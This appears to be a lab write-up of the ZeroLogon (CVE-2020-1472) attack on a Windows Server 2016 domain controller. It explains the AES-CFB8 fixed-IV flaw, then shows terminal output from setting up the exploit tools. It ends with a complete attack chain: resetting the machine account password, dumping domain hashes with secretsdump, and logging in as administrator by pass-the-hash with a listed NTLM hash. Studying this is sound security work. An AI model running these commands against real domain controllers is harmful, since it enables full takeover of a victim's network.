ZeroLogon Exploit
CVE-2020-1472, 6 Oct 2020
CVE-2020-1472, a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) which Microsoft released a patch (KB4565349) fixed in August 2020.
This vulnerability was discovered by secure security researcher Tom Tervoor on 11 September 2020. A weakness point was found on the encryption Advanced Encryption Standard – Cipher Feed Back 8 bit , (AES-CFB8) that used at the MS-NRPC to encrypt the client credential with the "Client Challenge" during the third steps of MS-NRPC.
ZeroLogon, affected all the windows servers that function as Active Directory domain controllers in enterprise networks.
The following diagram is the authentication handshake process of MS-NRPC, the attack happened on steps 3 on encrypting the client credential using the AES-CFB8.
Using the AES-CFB8 in MS-NRPC protocol has an issue with the Initialisation Vector (IV). The IV should be a random number, but MS-NRPC set a fixed IV of 16 bytes of zeros. Thus, if the client challenge set to all zeros, the probability of all zero encryption result is 1/256. It can easy to pass the step 4 validation.
The attack details can be referenced to the Whitepaper by Tom Tervoor
Host Name: FKCLAI-WIN2016
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
Domain: FKCLAI.local
Logon Server: \\FKCLAI-WIN2016
[email protected]:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.git
Cloning into 'zerologon'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0
Unpacking objects: 100% (22/22), done.
[email protected]:~/Documents/ctf/expoit#
Remove all impacket scripts
[email protected]:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacket
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
automater bdfproxy blindelephant couchdb creddump deblaze dh-python dnmap
erlang17-asn1 erlang17-base erlang17-crypto erlang17-eunit erlang17-inets
erlang17-mnesia erlang17-os-mon erlang17-public-key erlang17-runtime-tools
erlang17-snmp erlang17-ssl erlang17-syntax-tools erlang17-tools erlang17-webtool
erlang17-xmerl fimap findmyhash funkload gconf-service gconf2-common
ghost-phisher gir1.2-clutter-gst-3.0 gir1.2-gtkclutter-1.0 gir1.2-mutter-2
gir1.2-mutter-3 giskismet glusterfs-common gnome-theme-kali grabber
guile-2.0-libs gvfs-bin hexorbase intersect irqbalance jad kali-desktop-common
keimpx libacl1-dev libadns1 libarmadillo8 libasan4 libattr1-dev libavahi-gobject0
libayatana-ido3-0.4-0 libbfio1 libbind9-160 libboost-atomic1.62.0
libboost-chrono1.62.0 libboost-date-time1.62.0 libboost-filesystem1.62.0
libboost-iostreams1.62.0 libboost-program-options1.67.0 libboost-random1.62.0
libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.67.0
get the latest impacket from the https://github.com/SecureAuthCorp/impacket.git
[email protected]:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18598, done.
remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598
Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.
Resolving deltas: 100% (14169/14169), done.
[email protected]:~/Documents/ctf/tools/win/impacket# python setup.py install
running install
running bdist_egg
running egg_info
creating impacket.egg-info
writing requirements to impacket.egg-info/requires.txt
writing impacket.egg-info/PKG-INFO
writing top-level names to impacket.egg-info/top_level.txt
writing dependency_links to impacket.egg-info/dependency_links.txt
writing manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
warning: no files found matching 'tests' under directory 'examples'
warning: no files found matching '*.txt' under directory 'examples'
writing manife
..
..
..
... dding ldapdomaindump 0.9.1 to easy-install.pth file
Using /usr/lib/python3/dist-packages
Searching for ldap3==2.5.1
Best match: ldap3 2.5.1
Adding ldap3 2.5.1 to easy-install.pth file
Using /usr/lib/python3/dist-packages
Searching for Flask==1.1.1
Best match: Flask 1.1.1
Adding Flask 1.1.1 to easy-install.pth file
Installing flask script to /usr/local/bin
Using /usr/lib/python3/dist-packages
Finished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24
[email protected]:~/Documents/ctf/tools/win/impacket#
python3 set_empty_pw.py fkclai-win2016 192.168.1.169
secretsdump.py -just-dc administrator/fkclai-win2016\[email protected]
wmiexec.py fkclai/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
